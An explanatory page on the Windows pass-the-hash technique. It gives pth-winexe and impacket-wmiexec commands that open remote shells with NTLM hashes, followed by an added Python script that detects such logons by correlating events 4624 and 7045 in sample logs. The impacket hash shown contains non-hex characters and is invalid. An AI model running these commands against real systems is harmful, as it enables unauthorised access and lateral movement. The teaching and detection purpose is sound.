Pass the Hash
The pass-the-hash technique lets an attacker authenticate to another machine or service with a user's NTLM hash instead of the password, because NTLM authentication only ever proves possession of the hash. Most pth tools work by creating and starting a Windows service on the target that spawns a command or PowerShell prompt.
The following command connects to a system using the NTLM hash:
pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.19 cmd
In the above command, if the user belongs to a domain, the username must be prefixed with the domain name, e.g. "p42/John".
The string "aad3b435b51404eeaad3b435b51404ee" is the LM hash of an empty password; it is supplied only because the tool expects an LM:NT pair.
The same attack can be performed with Impacket, giving the account and host as user@host (the LM half of the -hashes value is left empty):
/usr/bin/impacket-wmiexec -hashes :08KDA34CDZ85D7A80E2EA3B9F05C415D <user>@<target-ip>
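From the defender's side, the service-based tools described above leave a recognisable host trace: an NTLM network logon (Security event 4624, LogonType 3) followed moments later by a service installation (System event 7045) under the same account. The script below is an added example, not part of the original page or of any tool it mentions; it runs that correlation over a constructed sample of event records, and the service name "winexesvc" and the hostnames, accounts and timestamps are illustrative assumptions.

```python
"""Correlate NTLM network logons (4624/LogonType 3) with service installs (7045)
on the same host by the same account within a short window.

All events below are constructed for illustration, not real telemetry."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple


@dataclass
class Event:
    ts: datetime
    host: str
    event_id: int          # 4624 = logon, 7045 = service installed
    user: str
    logon_type: Optional[int] = None      # 4624 only
    auth_package: Optional[str] = None    # 4624 only: "NTLM" or "Kerberos"
    service_name: Optional[str] = None    # 7045 only
    service_path: Optional[str] = None    # 7045 only


T0 = datetime(2024, 1, 1, 10, 0, 0)

# Constructed sample log. WS01 shows the pattern a service-based pth shell leaves;
# WS02 is a Kerberos logon (not NTLM), WS03 a service installed by a different
# account, WS04 an interactive (LogonType 2) NTLM logon at the console.
SAMPLE_EVENTS: List[Event] = [
    Event(T0, "WS01", 4624, "p42\\John", logon_type=3, auth_package="NTLM"),
    Event(T0 + timedelta(seconds=5), "WS01", 7045, "p42\\John",
          service_name="winexesvc", service_path="C:\\Windows\\winexesvc.exe"),
    Event(T0 + timedelta(minutes=1), "WS02", 4624, "p42\\Alice", logon_type=3, auth_package="Kerberos"),
    Event(T0 + timedelta(minutes=1, seconds=3), "WS02", 7045, "p42\\Alice",
          service_name="BackupAgent", service_path="C:\\Program Files\\Backup\\agent.exe"),
    Event(T0 + timedelta(minutes=5), "WS03", 4624, "p42\\John", logon_type=3, auth_package="NTLM"),
    Event(T0 + timedelta(minutes=5, seconds=2), "WS03", 7045, "NT AUTHORITY\\SYSTEM",
          service_name="WinDefend", service_path="C:\\Program Files\\Windows Defender\\MsMpEng.exe"),
    Event(T0 + timedelta(minutes=10), "WS04", 4624, "p42\\Bob", logon_type=2, auth_package="NTLM"),
    Event(T0 + timedelta(minutes=10, seconds=1), "WS04", 7045, "p42\\Bob",
          service_name="UpdaterSvc", service_path="C:\\Tools\\updater.exe"),
]


def ntlm_network_logons(events: List[Event]) -> List[Event]:
    """Network logons (type 3) that used NTLM rather than Kerberos."""
    return [e for e in events
            if e.event_id == 4624 and e.logon_type == 3
            and (e.auth_package or "").upper() == "NTLM"]


def correlate_logon_with_service(events: List[Event],
                                 window: timedelta = timedelta(seconds=60)
                                 ) -> List[Tuple[str, str, str, str]]:
    """Return (host, user, service_name, service_path) for every 7045 that follows
    an NTLM network logon by the same account on the same host within `window`.

    A legitimate PsExec-style admin session produces the same pair, so treat a hit
    as a triage lead to check against change records, not as proof of compromise."""
    logons = ntlm_network_logons(events)
    hits = []
    for svc in (e for e in events if e.event_id == 7045):
        for lg in logons:
            same_origin = lg.host == svc.host and lg.user.lower() == svc.user.lower()
            if same_origin and timedelta(0) <= svc.ts - lg.ts <= window:
                hits.append((svc.host, svc.user, svc.service_name or "", svc.service_path or ""))
                break
    return hits


if __name__ == "__main__":
    for host, user, name, path in correlate_logon_with_service(SAMPLE_EVENTS):
        print(f"[triage] {host}: NTLM network logon by {user} followed by service {name} ({path})")
```

The window defaults to 60 seconds because the tool-created service appears almost immediately after the logon; widen it if your log collection introduces delay, and feed real events by mapping the Security and System log fields onto the Event fields above.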